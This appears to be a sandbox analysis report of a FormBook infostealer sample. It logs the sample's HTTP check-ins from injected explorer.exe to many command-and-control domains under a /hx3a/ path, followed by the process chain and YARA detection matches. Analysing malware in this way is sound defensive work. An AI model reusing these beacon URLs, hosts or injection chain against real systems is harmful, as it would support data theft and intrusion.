                                                                          Date: Mon, 12 Apr 2021 08:03:24 GMT
                                                                          Server: Apache
                                                                          Location: https://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA==
                                                                          Content-Length: 319
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6c 6c 69 65 64 63 64 73 2e 63 6f 6d 2f 68 78 33 61 2f 3f 36 6c 3d 74 38 65 54 7a 66 41 38 72 42 37 70 79 26 61 6d 70 3b 79 76 4c 70 36 3d 33 42 6f 6e 49 54 59 64 78 4d 6e 30 67 4c 4d 2b 57 45 4c 56 59 67 6e 53 70 2b 71 59 61 36 6e 31 39 48 67 59 55 48 35 30 6f 7a 55 77 30 34 47 4c 44 6d 2b 62 6a 70 62 64 44 34 34 2f 6b 76 6b 58 6c 44 74 75 41 55 4d 4d 73 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&amp;yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA==">here</a>.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          10192.168.2.649712118.27.95.21580C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:04:30.239696026 CEST263OUTGET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g== HTTP/1.1
                                                                          Host: www.yakudatsu-hikaku.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:04:30.539264917 CEST264INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx
                                                                          Date: Mon, 12 Apr 2021 08:04:30 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 162
                                                                          Connection: close
                                                                          Location: https://www.yakudatsu-hikaku.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g==
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.64969534.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:03:40.254791975 CEST172OUTGET /hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.investmentpartners.limited
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:03:40.456928968 CEST173INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 12 Apr 2021 08:03:40 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6073fe55-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.64969734.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:03:45.624224901 CEST184OUTGET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q== HTTP/1.1
                                                                          Host: www.stacksyspro.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:03:45.825258970 CEST185INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 12 Apr 2021 08:03:45 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6073fe55-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.649698103.86.176.1080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:03:51.573878050 CEST186OUTGET /hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.aksharnewtown.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:03:51.744096041 CEST186INHTTP/1.1 301 Moved Permanently
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Location: https://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py
                                                                          Server: Microsoft-IIS/10.0
                                                                          X-Powered-By: ASP.NET
                                                                          X-Powered-By-Plesk: PleskWin
                                                                          Date: Mon, 12 Apr 2021 08:03:50 GMT
                                                                          Connection: close
                                                                          Content-Length: 262
                                                                          Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6b 73 68 61 72 6e 65 77 74 6f 77 6e 2e 63 6f 6d 2f 68 78 33 61 2f 3f 79 76 4c 70 36 3d 55 4b 43 64 53 4c 52 2b 6c 79 72 51 62 62 62 43 50 32 4d 68 6c 55 73 6b 37 79 66 53 47 4d 46 5a 45 75 72 51 74 31 4f 59 45 44 45 31 5a 38 65 5a 62 49 44 49 6b 75 61 7a 30 4c 34 6e 57 65 73 36 34 57 47 59 72 59 78 41 71 67 3d 3d 26 61 6d 70 3b 36 6c 3d 74 38 65 54 7a 66 41 38 72 42 37 70 79 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                          Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&amp;6l=t8eTzfA8rB7py">here</a></body>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          5192.168.2.649702163.44.185.22680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:03:57.387516975 CEST196OUTGET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA== HTTP/1.1
                                                                          Host: www.tonton-koubou.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:03:57.865974903 CEST197INHTTP/1.1 301 Moved Permanently
                                                                          Date: Mon, 12 Apr 2021 08:03:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.12
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-Redirect-By: WordPress
                                                                          Location: http://tonton-koubou.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA==
                                                                          X-Cache: MISS


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          6192.168.2.64970391.236.136.1280C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:04:03.143248081 CEST198OUTGET /hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.formula-kuhni.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:04:03.245630026 CEST198INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 12 Apr 2021 08:04:03 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Content-Length: 19
                                                                          Connection: close
                                                                          Data Raw: 34 30 34 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: 404 File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          7192.168.2.64970681.17.18.19880C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:04:13.810667038 CEST222OUTGET /hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.xn--ol-xia.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:04:13.872195959 CEST223INHTTP/1.1 200 OK
                                                                          cache-control: max-age=0, private, must-revalidate
                                                                          connection: close
                                                                          content-length: 583
                                                                          content-type: text/html; charset=utf-8
                                                                          date: Mon, 12 Apr 2021 08:04:13 GMT
                                                                          server: nginx
                                                                          set-cookie: sid=aba351c6-9b65-11eb-9d74-2dd539372245; path=/; domain=.xn--ol-xia.com; expires=Sat, 30 Apr 2089 11:18:20 GMT; max-age=2147483647; HttpOnly
                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 78 6e 2d 2d 6f 6c 2d 78 69 61 2e 63 6f 6d 2f 68 78 33 61 2f 3f 36 6c 3d 74 38 65 54 7a 66 41 38 72 42 37 70 79 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4f 44 49 79 4d 54 67 31 4d 79 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 34 4d 6a 45 30 4e 6a 55 7a 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 48 46 6e 63 6a 6c 79 5a 48 45 77 4e 58 59 79 4e 6a 63 34 5a 7a 51 78 4d 57 73 35 63 57 45 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 67 79 4d 54 51 32 4e 54 4d 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 34 4d 6a 45 30 4e 6a 55 7a 4f 44 59 79 4e 54 4d 35 66 51 2e 35 50 4c 36 2d 31 69 6a 66 68 39 61 35 37 49 64 72 39 42 38 48 56 38 53 78 6b 7a 6f 32 57 70 34 46 64 6c 4f 4b 67 4f 73 36 6e 41 26 73 69 64 3d 61 62 61 33 35 31 63 36 2d 39 62 36 35 2d 31 31 65 62 2d 39 64 37 34 2d 32 64 64 35 33 39 33 37 32 32 34 35 26 79 76 4c 70 36 3d 6f 2b 33 77 59 6a 4e 69 66 64 45 36 46 4b 45 30 62 4f 69 7a 6e 79 6f 38 6a 47 6e 37 76 6a 56 56 72 4a 70 4e 5a 48 4b 6b 71 37 50 61 43 61 70 6e 67 70 52 51 6f 4d 63 56 73 6b 6c 36 36 55 6f 44 47 6f 35 45 7a 74 50 2b 55 51 25 33 44 25 33 44 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                          Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.xn--ol-xia.com/hx3a/?6l=t8eTzfA8rB7py&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxODIyMTg1MywiaWF0IjoxNjE4MjE0NjUzLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycHFncjlyZHEwNXYyNjc4ZzQxMWs5cWEiLCJuYmYiOjE2MTgyMTQ2NTMsInRzIjoxNjE4MjE0NjUzODYyNTM5fQ.5PL6-1ijfh9a57Idr9B8HV8Sxkzo2Wp4FdlOKgOs6nA&sid=aba351c6-9b65-11eb-9d74-2dd539372245&yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ%3D%3D');</script></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          8192.168.2.64970834.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:04:19.133089066 CEST236OUTGET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A== HTTP/1.1
                                                                          Host: www.ugonget.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:04:19.335300922 CEST237INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 12 Apr 2021 08:04:19 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "60737936-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          9192.168.2.649709104.21.37.1680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 12, 2021 10:04:24.470243931 CEST237OUTGET /hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py HTTP/1.1
                                                                          Host: www.jabberjawmobile.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 12, 2021 10:04:24.554410934 CEST238INHTTP/1.1 403 Forbidden
                                                                          Date: Mon, 12 Apr 2021 08:04:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: __cfduid=daaf5a24835a7e9f50c170a78d80a16e01618214664; expires=Wed, 12-May-21 08:04:24 GMT; path=/; domain=.jabberjawmobile.com; HttpOnly; SameSite=Lax
                                                                          CF-Cache-Status: DYNAMIC
                                                                          cf-request-id: 0966b5513c00006b958d83a000000001
                                                                          Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zVt%2FYAlPkl7zivBGWfRUYg%2FhAZg%2BCy%2F7q2LhbRTtG6H1n5z7CU299XLicxON7g6PZ4idKZDwFV2Z2nklvpYQxQzvzitQDQJzSzEGTjUncyu21bFFSJvbXg%3D%3D"}]}
                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 63eaf1952c266b95-LHR
                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: 4oItdZkNOZ.exe PID: 4744 Parent PID: 5948

                                                                          General

                                                                          Start time:10:02:28
                                                                          Start date:12/04/2021
                                                                          Path:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\4oItdZkNOZ.exe'
                                                                          Imagebase:0x400000
                                                                          File size:394513 bytes
                                                                          MD5 hash:36CF33E57CCCCF3754B57AB14E623E57
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Analysis Process: 4oItdZkNOZ.exe PID: 3540 Parent PID: 4744

                                                                          General

                                                                          Start time:10:02:29
                                                                          Start date:12/04/2021
                                                                          Path:C:\Users\user\Desktop\4oItdZkNOZ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\4oItdZkNOZ.exe'
                                                                          Imagebase:0x400000
                                                                          File size:394513 bytes
                                                                          MD5 hash:36CF33E57CCCCF3754B57AB14E623E57
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Analysis Process: explorer.exe PID: 3440 Parent PID: 3540

                                                                          General

                                                                          Start time:10:02:34
                                                                          Start date:12/04/2021
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:
                                                                          Imagebase:0x7ff6f22f0000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Analysis Process: cscript.exe PID: 5708 Parent PID: 3440

                                                                          General

                                                                          Start time:10:02:48
                                                                          Start date:12/04/2021
                                                                          Path:C:\Windows\SysWOW64\cscript.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\cscript.exe
                                                                          Imagebase:0x240000
                                                                          File size:143360 bytes
                                                                          MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, Author: Joe Security
